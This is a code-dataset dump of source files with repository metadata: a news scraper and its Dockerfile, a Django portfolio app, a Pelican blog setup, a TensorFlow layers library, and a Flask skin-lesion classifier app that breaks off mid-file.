"text": "from wayback import get_wayback_url\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom simurg.clients.fetcher import fetch\nfrom simurg.scrapper import scrapper\nimport logging\nimport uuid\n\n\ndef build_news(url):\n \"\"\"Constructs the first version of a news that hat to be completed later.\n A news consists of the following fields:\n id, headline, url, wayback_url\n\n # Arguments\n url: top story page that contains the news\n\n # Returns\n news: a news dictionary objects\n \"\"\"\n try:\n html = fetch(url)\n except StandardError:\n logging.debug('Error fetching story page {}'.format(url))\n html = None\n\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n news_elements = scrapper.get_news_elements(soup)\n for news_el in news_elements:\n news = {}\n news['id'] = unicode(uuid.uuid4())\n news['headline'] = scrapper.get_news_headline(news_el).text\n news['url'] = scrapper.get_news_link(news_el).get('href')\n news['wayback_url'] = get_wayback_url(news['url'])\n news['timestamp'] = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n yield news\n else:\n yield None\n"
},
{
"alpha_fraction": 0.7524430155754089,
"alphanum_fraction": 0.7703583240509033,
"avg_line_length": 25.69565200805664,
"blob_id": "5b9837f150ad7c58eafd02ea43d43a33b9cb2465",
"content_id": "c2ab385f6b18f9e2d7c86c6579306b169c9919f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 614,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 23,
"path": "/Dockerfile",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "FROM pasmod/miniconder2\n\nRUN apt-get update && \\\n\tapt-get install -y build-essential libxml2-dev libxslt-dev libsm6 libxrender1 libfontconfig1 libicu-dev python-dev libhunspell-dev && \\\n apt-get install -y libblas-dev liblapack-dev libatlas-base-dev gfortran && \\\n\tapt-get clean\n\nRUN conda install -y \\\n beautifulsoup4==4.4.1\n\nRUN pip install redis\nRUN pip install unidecode\nRUN pip install numpy\nRUN pip install --upgrade cython\nRUN pip install lxml\nRUN pip install dragnet\nRUn pip install httplib2\n\nWORKDIR /var/www\nADD . .\nRUN pip install --upgrade pip\nRUN pip install -r requirements.txt\n#RUN py.test --pep8\n"
},
{
"alpha_fraction": 0.586776852607727,
"alphanum_fraction": 0.5904958844184875,
"avg_line_length": 36.230770111083984,
"blob_id": "634e896ca4b0bd2aeda75e74339f355cbabe8bd9",
"content_id": "1ff1ae1775f6bcb3272ecf62c855c51044f85881",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2420,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 65,
"path": "/simurg/simurg.py",
"repo_name": "pasmod/simurg",
"src_encoding": "UTF-8",
"text": "from scrapper.template import get_base_url, append_html\nfrom scrapper.template import append_headline_selector\nfrom urlparse import urlparse, parse_qs\nfrom clients.redis_client import RedisClient\nfrom scrapper.news_builder import build_news\nfrom util import is_valid\nfrom scrapper.scrapper import get_story_urls\nfrom scrapper import template\nimport logging\nimport time\nimport json\nimport sys\nimport io\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\ndef create_template_corpus(lang='de'):\n \"\"\"Creates a template corpus where for each news url, the headline css\n selector and wayback_url of the news is stored.\n\n # Arguments:\n lang: language of the corpus\n \"\"\"\n redis_client = RedisClient(lang=lang)\n base_url = get_base_url(lang=lang)\n while True:\n story_urls = get_story_urls(base_url)\n for url in story_urls:\n story = parse_qs(urlparse(url).query, keep_blank_values=True)['q']\n story = unicode(story[0])\n logging.info('Processing story \"{}\"'.\n format((story.decode('utf-8'))))\n for news in build_news(url):\n if news:\n news = append_html(news, redis_client)\n news = append_headline_selector(news)\n if is_valid(news, field='headline_selector'):\n redis_client.insert(news)\n else:\n logging.debug('Ignoring invalid news with url: {}'.\n format(news['url']))\n time.sleep(300)\n\n\ndef populate_template_corpus(lang='de'):\n \"\"\"Populates the news with required fields and write them to json files.\n For each news object a json file which has the id of news is created\n\n # Arguments:\n lang: language of the corpus\n \"\"\"\n redis_client = RedisClient(lang=lang)\n for news in template.populate(redis_client):\n if not is_valid(news, field='headline'):\n continue\n base = 'docs/' + lang + '/'\n filename = base + news['id'] + '.json'\n with io.open(filename, 'w', encoding='utf8') as json_file:\n data = json.dumps(news,\n ensure_ascii=False,\n encoding='utf8',\n indent=4)\n logging.info('Wrote document to disk: id={}'.format(news['id']))\n json_file.write(unicode(data))\n"
}
] | 15 |
TheGodlessOne/portfolio | https://github.com/TheGodlessOne/portfolio | b82ea2cf586e2b98c04e1e1a57fbe25caf845dd6 | 60a9d30fafe5b1e3dd6da6c3270e0ad04c31148c | 81263787b30fa35ccda096a07e402bfff52ad1ca | refs/heads/master | 2021-02-08T02:33:41.140539 | 2020-03-05T07:26:48 | 2020-03-05T07:26:48 | 244,099,497 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5226480960845947,
"alphanum_fraction": 0.588850200176239,
"avg_line_length": 16.9375,
"blob_id": "9c1f64f3d22d229fbf25afb50c20250a671f259d",
"content_id": "b9f18042d1857d4d7a489af09eb7089510d75707",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/responce/migrations/0003_delete_responce.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.7 on 2020-03-05 06:30\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('responce', '0002_project'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='Responce',\n ),\n ]\n"
},
{
"alpha_fraction": 0.6741213798522949,
"alphanum_fraction": 0.6741213798522949,
"avg_line_length": 33.77777862548828,
"blob_id": "1f73fa92d8e076020d1a88736381c2d369add5ad",
"content_id": "e67bfcb84ff41f8fd593cd368a47ae2ad44aa6e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 9,
"path": "/responce/urls.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('index.html', views.index, name='index'),\n path('projects/', views.project_all, name='projects'),\n path('projects/<int:pk>/', views.project_detail, name='project_detail'),\n path('contact/', views.contact_form, name='contact'),\n]\n"
},
{
"alpha_fraction": 0.5158849954605103,
"alphanum_fraction": 0.5506808161735535,
"avg_line_length": 26.54166603088379,
"blob_id": "7f268d54115c7c83e6671b09fdce541eef343ea0",
"content_id": "529293da633fd46afdd0ebdf30d060ca3f8188ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 24,
"path": "/responce/migrations/0001_initial.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.7 on 2020-03-01 13:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Responce',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('email', models.EmailField(max_length=254)),\n ('site_url', models.URLField()),\n ('comment', models.TextField(max_length=240)),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.5612903237342834,
"alphanum_fraction": 0.57419353723526,
"avg_line_length": 21.14285659790039,
"blob_id": "d16a2e0dede157c3d46860d2b60d508c02ffcb85",
"content_id": "01f722ddefbb69db6460ba9561660431c3c76d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/responce/templates/index.html",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block page_content %}\n <h1>Hi!</h1>\n <p>This is the portfolio</p>\n <p>Leave your contacts below:</p>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.668367326259613,
"alphanum_fraction": 0.668367326259613,
"avg_line_length": 27,
"blob_id": "dede2415209ee8579b8369d1d2fa88bacb709681",
"content_id": "c19d0d160ae3d0f7653688c3a5754be5645c04b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 7,
"path": "/responce/forms.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom responce.models import Responce\n\nclass Responce(forms.ModelForm): \n class Meta:\n model = Responce\n fields = ['name', 'email', 'site_url', 'comment']\n"
},
{
"alpha_fraction": 0.7582417726516724,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 17.200000762939453,
"blob_id": "64aadfc863334831cae909633756e8ae21e41bd8",
"content_id": "f1cc61ae6c4634b27d1ee5d9a57faa7b63d887f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/responce/apps.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ResponceConfig(AppConfig):\n name = 'responce'\n"
},
{
"alpha_fraction": 0.6774942278862,
"alphanum_fraction": 0.7006960511207581,
"avg_line_length": 31.846153259277344,
"blob_id": "8d357e8b5b3cb66f3cf6d3f8705deb03465190b9",
"content_id": "945ceb976d1a00fe112a2f98c8f4ce6b8769e6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/responce/models.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Responce(models.Model): \n name = models.CharField(max_length = 20)\n email = models.EmailField()\n site_url = models.URLField()\n comment = models.TextField(max_length = 240)\n\nclass Project(models.Model):\n title = models.CharField(max_length=100)\n description = models.TextField()\n technology = models.CharField(max_length=20)\n image = models.FilePathField(path=\"/img\")\n "
},
{
"alpha_fraction": 0.6471067667007446,
"alphanum_fraction": 0.6503667235374451,
"avg_line_length": 28.926828384399414,
"blob_id": "49683ee87524eb8e715666a374680524a3c0093e",
"content_id": "4827a863d1cd40113b1aa1a83640b92a4c143569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 41,
"path": "/responce/views.py",
"repo_name": "TheGodlessOne/portfolio",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom responce.models import Project\nfrom responce.forms import Responce\nfrom django.views.decorators.cache import cache_page\nfrom django.views.decorators.csrf import csrf_protect\n\n\n# Create your views here.\ndef index(request): \n return render(request, 'index.html')\n\ndef project_all(request):\n projects = Project.objects.all()\n context = {\n 'projects': projects\n }\n return render(request, 'projects.html', context)\n\ndef project_detail(request, pk):\n project = Project.objects.get(pk=pk)\n context = {\n 'project': project\n }\n return render(request, 'project_detail.html', context)\n\n@cache_page(60 * 15)\n@csrf_protect\ndef contact_form(request):\n if request.method == 'POST':\n form = Responce(request.POST)\n if form.is_valid():\n name = form.fields['name']\n email = form.fields['email']\n site_url = form.fields['site_url']\n comment = form.fields['comment']\n instances = form.save()\n return render(request, 'contacts.html', {'form': form})\n else:\n form = Responce()\n return render(request, 'contacts.html', {'form': form})\n"
}
] | 8 |
louiseyeh/read_file | https://github.com/louiseyeh/read_file | 76818a2e3f0d0c4a8c4d2c55ca74ae9d1ff4c354 | e95a08a65c2d6436d63b42d136b866db70c4645c | cc758ed3197ae93a2112ecd1ff47f7981b6ea106 | refs/heads/master | 2020-03-28T20:42:29.670178 | 2018-09-18T03:33:31 | 2018-09-18T03:33:31 | 149,095,035 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5600489974021912,
"alphanum_fraction": 0.5992646813392639,
"avg_line_length": 18.90243911743164,
"blob_id": "6112ed9920fc84c57cf462fb61c74bf777e9dbc6",
"content_id": "e1ca40edd58a00b3ef484a43b0bc0b530cd7ee3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 41,
"path": "/read_reviews.py",
"repo_name": "louiseyeh/read_file",
"src_encoding": "UTF-8",
"text": "data = []\ncount = 0\nwith open('reviews.txt', 'r') as f:\n\tfor line in f:\n\t\tdata.append(line)\n\t\tcount += 1\n\t\tif count % 10000 ==0: #%求餘數 每讀取10000筆資料顯示進度\n\t\t\tprint(len(data))\nprint('檔案讀取完了總共有', len(data), '筆資料')\n\nsum_len = 0\nfor d in data: #每一筆資料為d\n\tsum_len = sum_len + len(d) #累積每一筆長度\nprint('留言的平均長度是', sum_len / len(data))\n\nnew = []\nfor d in data:\n\tif len(d) < 100:\n\t\tnew.append(d)\nprint('一共有', len(d), '筆留言長度<100字母')\nprint(new[0].strip())\nprint('--------')\nprint(new[1])\n\n#good = []\n#for d in data:\n#\tif 'good' in d:\n#\t\tgood.append(d)\ngood = [d for d in data if 'good' in d]\n\nprint('一共有', len(good), '筆留言提到good')\nprint('第6筆資料', good[5])\n\ngood = [1 for d in data if 'good' in d]\nprint(good)\n\nbad = ['bad' in d for d in data] #無篩選 1000000 個 true/false\n# bad = []\n# for d in data:\n#\tbad.append('bad' in d)\nprint(bad)\n"
}
] | 1 |
willettk/pelican-blog | https://github.com/willettk/pelican-blog | c5c5e4986ae7d0cd98654aefdeb18a40cbdcd6c4 | eba02a3c651f74fb724176e0c1fbb88b15ae91a4 | 342187570df941cace2fb44f7fe5f21a4b9fbeb1 | refs/heads/master | 2021-01-15T13:44:08.651800 | 2016-09-17T21:31:13 | 2016-09-17T21:31:13 | 68,479,096 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7307692170143127,
"avg_line_length": 25,
"blob_id": "10a38e12cb2bb214027a2323d4558122233d2345",
"content_id": "f3fb65ad683189e22e8347c0cd69396c51faac86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 2,
"path": "/README.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "# pelican-blog\nBlog for Kyle Willett. Powered by Pelican.\n"
},
{
"alpha_fraction": 0.6438094973564148,
"alphanum_fraction": 0.6514285802841187,
"avg_line_length": 20,
"blob_id": "4bcd4a82c0bffa5e88475c268f39abae44f51f14",
"content_id": "56321f8ccd200b52efd0a3360bfe450a9ea33c67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1575,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 75,
"path": "/pelicanconf.py",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Kyle Willett'\n#SITEURL = 'willettk.github.io/blog'\nSITENAME = u'Kyle Willett - Blog'\n\nSITETITLE = 'Kyle Willett'\nSITESUBTITLE = 'Data Scientist'\nSITEDESCRIPTION = 'Projects and Diversions of Kyle Willett'\n\nPATH = 'content'\n\nTIMEZONE = 'America/New_York'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('main homepage', 'https://willettk.github.io'),)\n\n# Social widget\nSOCIAL = (('twitter', 'http://twitter.com/kwwillett'),\n ('github', 'http://github.com/willettk'),\n ('linkedin', 'https://www.linkedin.com/in/willettk'))\n\nTWITTER_USERNAME = 'kwwillett'\n\nDEFAULT_PAGINATION = False\n\n# Theme\nTHEME = \"./Flex\"\n\nSTATIC_PATHS = [\n 'extra/favicon.ico'\n]\nEXTRA_PATH_METADATA = {\n 'extra/favicon.ico': {'path': 'favicon.ico'}\n}\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nBROWSER_COLOR = '#333'\nROBOTS = 'index, follow'\n\nCC_LICENSE = {\n 'name': 'Creative Commons Attribution-ShareAlike',\n 'version': '4.0',\n 'slug': 'by-sa'\n}\n\nCOPYRIGHT_YEAR = 2016\n\nMAIN_MENU = True\n\n# Translate to German.\nDEFAULT_LANG = 'en'\n\n# Default theme language.\nI18N_TEMPLATES_LANG = 'en'\n\nMENUITEMS = (('Archives', '/archives.html'),\n ('Categories', '/categories.html'),\n ('Tags', '/tags.html'),)\n\nDATE_FORMATS = {\n 'en': '%d %b %Y',\n}\n"
},
{
"alpha_fraction": 0.708737850189209,
"alphanum_fraction": 0.737864077091217,
"avg_line_length": 31.959999084472656,
"blob_id": "575bc7e734ef0470c35a284e8d90c27607eb4b13",
"content_id": "5f0bcc8011f5bdf7e80048afc27b13def575d24c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 824,
"license_type": "permissive",
"max_line_length": 289,
"num_lines": 25,
"path": "/content/pages/about.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "Title: About\nDate: 2016-09-17 16:00\nModified: 2016-09-17 16:00\n\n### Who\n\nHi. My name's [Kyle Willett](http://www.kylewillett.com). \n\nI'm a data scientist, currently transitioning into industry from academia. I have a PhD in astrophysics from the University of Colorado. I recently finished a five-year postdoc at the University of Minnesota, mostly working with the amazing [Galaxy Zoo](http://www.galaxyzoo.org) project. \n\n### What\n\nThis is a landing site for posts on data science, astronomy, recent projects, or anything else that's hopefully either interesting or useful.\n\n### Where\n\nI currently live outside of Lexington, Kentucky. \n\n### Why\n\nIt's good to have a place to semi-permanently share content. \n\n### How\n\n[Github](https://github.com/), [Python](https://www.python.org/), and [Pelican](http://blog.getpelican.com/).\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 21,
"blob_id": "e36648db6afd33904921eac688779d5ca14c6636",
"content_id": "4fad7891525e7b874354e1b78aad49cfb43057b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 110,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 5,
"path": "/content/2016-09-17_firstpost.md",
"repo_name": "willettk/pelican-blog",
"src_encoding": "UTF-8",
"text": "Title: First Post with Pelican\nDate: 2016-09-16 14:00\nCategory: Test\n\nInitial post with the Pelican software.\n"
}
] | 4 |
Monnoroch/tensorlayers | https://github.com/Monnoroch/tensorlayers | 2a9908fadeeb22ad2b4ae713a42391fa8595ae41 | 3b7f8f33dc1a799fcd60d4db2c29e4d8717e3c52 | 82d5d5171ece19a23b397de43db6f4596f2be34b | refs/heads/master | 2021-01-10T15:49:30.210251 | 2015-11-16T16:37:06 | 2015-11-16T16:37:06 | 46,138,814 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 26,
"blob_id": "2f1c9ed352d74009f91707eb95142f9697be5d35",
"content_id": "6bb424f9ae9e079b75c8b84e3db991124a19a5c4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Monnoroch/tensorlayers",
"src_encoding": "UTF-8",
"text": "# tensorlayers\nA collection of layers for TensorFlow. \n"
},
{
"alpha_fraction": 0.6414700746536255,
"alphanum_fraction": 0.648852527141571,
"avg_line_length": 28.530805587768555,
"blob_id": "5343451831fd01380e7786e86271017654254fb5",
"content_id": "df67fca679cac0937b814015237a6dc1385246f6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6231,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 211,
"path": "/layers.py",
"repo_name": "Monnoroch/tensorlayers",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport tensorflow as tf\n\n\nclass Layer(object):\n \"\"\"\n Layer interface.\n A Layer has to have name: string, input: Layer and output tensorflow.Tensor.\n \"\"\"\n\n def __init__(self, input, name=\"input\"):\n self.name = name\n self.input = input\n self.output = None\n\n def get_dict(self, **args):\n if self.input is None:\n return {}\n else:\n return self.input.get_dict(**args)\n\nclass InputLayer(Layer):\n \"\"\"\n An input Layer, just proxies its input to the output.\n \"\"\"\n\n def __init__(self, input, name=\"input\"):\n super(InputLayer, self).__init__(None, name)\n self.output = input\n\n def get_dict(self, **args):\n return {}\n\nclass DropoutLayer(Layer):\n \"\"\"\n A layer that zeroes some values from a previous layer.\n \"\"\"\n\n def __init__(self, input, p=0.5, name=\"dropout\"):\n super(DropoutLayer, self).__init__(input, name)\n self.prob = p\n self.prob_var = tf.placeholder(\"float\", shape=(), name=\"keep_prob\")\n self.output = tf.nn.dropout(self.input.output, self.prob_var, name=self.name)\n\n def get_dict(self, **args):\n d = self.input.get_dict(**args)\n if d is None:\n d = {}\n\n if not args.get(\"dropout\", True):\n d[self.prob_var] = 1.0\n else:\n d[self.prob_var] = self.prob\n return d\n\nclass NonlinearityLayer(Layer):\n \"\"\"\n A layer that applies a function elementwise to the previous layer.\n \"\"\"\n\n def __init__(self, input, fun, name=\"nonlinearity\"):\n super(NonlinearityLayer, self).__init__(input, name)\n self.output = fun(self.input.output)\n\nclass BiasLayer(Layer):\n \"\"\"\n A layer that adds a nicely initialized bias vector to the previous layer.\n \"\"\"\n\n def __init__(self, input, name=\"bias\"):\n super(BiasLayer, self).__init__(input, name)\n\n last_shape = self.input.output.get_shape().as_list()\n biases = tf.Variable(tf.constant(0.1, shape=[last_shape[-1]]), name=\"biases\")\n self.output = tf.add(self.input.output, biases, name=self.name)\n\nclass ReshapeLayer(Layer):\n \"\"\"\n A layer that reshapes previous layer outputs.\n \"\"\"\n\n def __init__(self, input, shape, name=\"reshape\"):\n super(ReshapeLayer, self).__init__(input, name)\n\n if shape == \"flat\":\n last_shape = self.input.output.get_shape().as_list()\n size = 1\n for v in last_shape[1:]:\n size *= v\n shape = [-1, size]\n else:\n shape = [-1] + shape\n\n self.output = tf.reshape(self.input.output, shape, self.name)\n\nclass MatrixLayer(Layer):\n \"\"\"\n A layer that multiplies previous layer outputs to a nicely initialized matrix.\n \"\"\"\n\n def __init__(self, input, hidden_units, name=\"matrix\"):\n super(MatrixLayer, self).__init__(input, name)\n num_inputs = self.input.output.get_shape().as_list()[1]\n weights = tf.Variable(\n tf.truncated_normal([num_inputs, hidden_units], stddev=1.0 / math.sqrt(float(num_inputs))),\n name='weights'\n )\n self.output = tf.matmul(self.input.output, weights, name=self.name)\n\nclass Conv2dApplyLayer(Layer):\n \"\"\"\n A layer applies two-dimentional convolution.\n \"\"\"\n\n def __init__(self, input, filter_size, num_filters, strides=[1, 1, 1, 1], padding=\"SAME\", name=\"conv2d_apply\"):\n super(Conv2dApplyLayer, self).__init__(input, name)\n if type(filter_size) is not tuple:\n filter_size = (filter_size, filter_size)\n\n last_shape = self.input.output.get_shape().as_list()\n size = 1\n for v in last_shape[1:]:\n size *= v\n\n channels = last_shape[3]\n weights = tf.Variable(\n tf.truncated_normal([filter_size[0], filter_size[1], channels, num_filters], stddev=1.0 / math.sqrt(float(size))),\n name='weights'\n )\n self.output = tf.nn.conv2d(self.input.output, weights, strides=strides, padding=padding, name=self.name)\n\nclass MaxPoolingLayer(Layer):\n \"\"\"\n A layer applies max-pooling.\n \"\"\"\n\n def __init__(self, input, ksize, strides, padding=\"SAME\", name=\"maxpool\"):\n super(MaxPoolingLayer, self).__init__(input, name)\n self.output = tf.nn.max_pool(self.input.output, ksize, strides, padding, name=self.name)\n\nclass ConcatLayer(Layer):\n \"\"\"\n A layer that concats previous layers outputs.\n \"\"\"\n\n def __init__(self, inputs, dim=1, name=\"concat\"):\n super(ConcatLayer, self).__init__(inputs, name)\n self.output = tf.concat(dim, map(lambda x: x.output, self.input), name=self.name)\n\n def get_dict(self, **args):\n d = {}\n for i in self.input:\n self._join_dicts(d, i.get_dict(**args))\n return d\n\n def _join_dicts(self, d1, d2):\n if d2 is None:\n return d1\n\n for k in d2:\n d1[k] = d2[k]\n return d1\n\nclass CompositeLayer(Layer):\n def __init__(self, input, name=\"composite\"):\n super(CompositeLayer, self).__init__(input, name)\n self.network = None\n\n def get_dict(self, **args):\n return self.network.get_dict(**args)\n\nclass DenseLayer(CompositeLayer):\n \"\"\"\n A fully connected layer.\n \"\"\"\n\n def __init__(self, input, hidden_units, fun=tf.nn.relu, dropout=None, name=\"dense\"):\n super(DenseLayer, self).__init__(input, name)\n\n network = ReshapeLayer(input, \"flat\")\n network = MatrixLayer(network, hidden_units)\n network = BiasLayer(network)\n network = NonlinearityLayer(network, fun)\n if dropout is not None:\n network = DropoutLayer(network, dropout)\n self.network = network\n self.output = self.network.output\n\nclass Conv2dLayer(CompositeLayer):\n \"\"\"\n A layer applies two-dimentional convolution with bias, nonlinearity, max-pooling and optional dropout.\n \"\"\"\n\n def __init__(self, input, num_filters, filter_size, pool_size=None, pool_stride=None, fun=tf.nn.relu, dropout=None, name=\"conv2d\"):\n super(Conv2dLayer, self).__init__(input, name)\n\n network = Conv2dApplyLayer(input, filter_size, num_filters)\n network = BiasLayer(network)\n network = NonlinearityLayer(network, fun)\n if pool_size is None or pool_stride is None:\n assert pool_size is None and pool_stride is None\n else:\n network = MaxPoolingLayer(network, [1, pool_size, pool_size, 1], [1, pool_stride, pool_stride, 1])\n if dropout is not None:\n network = DropoutLayer(network, dropout)\n self.network = network\n self.output = self.network.output\n"
}
] | 2 |
khanma1962/Image-Classification-on-skin-lesion-HAM10000 | https://github.com/khanma1962/Image-Classification-on-skin-lesion-HAM10000 | 8e3f12b178c74bafe7ab43a0311838668f56b0da | eaa18ad6bf6b2ea54eed8447e8d0aaf91ec1ace6 | 350cbd82d1e9bd57b95f7ff46627a24422ef5882 | refs/heads/main | 2023-04-07T16:45:42.944055 | 2021-04-19T05:20:40 | 2021-04-19T05:20:40 | 356,076,371 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7913862466812134,
"alphanum_fraction": 0.8156123757362366,
"avg_line_length": 122.5,
"blob_id": "23eb86bf898be46c0a1f943d6c717afcea83f80a",
"content_id": "2b9c485d5431e454b56e9d3a62453fb310800741",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 605,
"num_lines": 6,
"path": "/README.md",
"repo_name": "khanma1962/Image-Classification-on-skin-lesion-HAM10000",
"src_encoding": "UTF-8",
"text": "# HAM10000-dermatoscopic-images-\n\nDataset taken from:\nhttps://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/DBW86T\n\nThis dataset consists of 10015 dermatoscopic images which can serve as a training set for academic machine learning purposes. Cases include a representative collection of all important diagnostic categories in the realm of pigmented lesions: Actinic keratoses and intraepithelial carcinoma / Bowen's disease (akiec), basal cell carcinoma (bcc), benign keratosis-like lesions (solar lentigines / seborrheic keratoses and lichen-planus like keratoses, bkl), dermatofibroma (df), melanoma (mel), melanocytic nevi (nv) and vascular lesions (angiomas, angiokeratomas, pyogenic granulomas and hemorrhage, vasc).\n\n\n"
},
{
"alpha_fraction": 0.648061990737915,
"alphanum_fraction": 0.6661498546600342,
"avg_line_length": 23.0625,
"blob_id": "5f64d35084f20f0caf77808d7d7a23a752a31014",
"content_id": "d25f045675b3947941299bf25212cf813dc03e95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 80,
"path": "/my_image_example.py",
"repo_name": "khanma1962/Image-Classification-on-skin-lesion-HAM10000",
"src_encoding": "UTF-8",
"text": "from __future__ import division, print_function\n# conding=utf-8\n# tensorflow and keras\n# import tensorflow as tf \nfrom keras.applications.imagenet_utils import preprocess_input, decode_predictions\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n\n# flask util\nfrom flask import Flask, redirect, url_for, request, render_template\nfrom werkzeug.utils import secure_filename\nfrom gevent.pywsgi import WSGIServer\n\nimport numpy as np \nimport sys\nimport os\nimport glob\nimport re \n\n#https://stackoverflow.com/questions/65907365/tensorflow-not-creating-xla-devices-tf-xla-enable-xla-devices-not-set\n\nos.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n\n\n# define flask app\napp = Flask(__name__)\n\n#model path\nmodel_path = '../HAM10000_4_7.h5'\n\n# load the trained model\nmodel = load_model(model_path)\n# model._make_predict_function() # this is for old TF\n\nprint('Model loaded. Check http://127.0.0.1:5000')\n\ndef model_predict(img_path, model):\n\n img = image.load_img(img_path, target_size = (254, 254))\n\n #preprocess the image\n x = image.img_to_array(img)\n \n #expand the dimension\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_input(x, mode= 'caffe')\n\n preds = model.predict(x)\n return preds\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\[email protected]('/predict', methods=['GET', 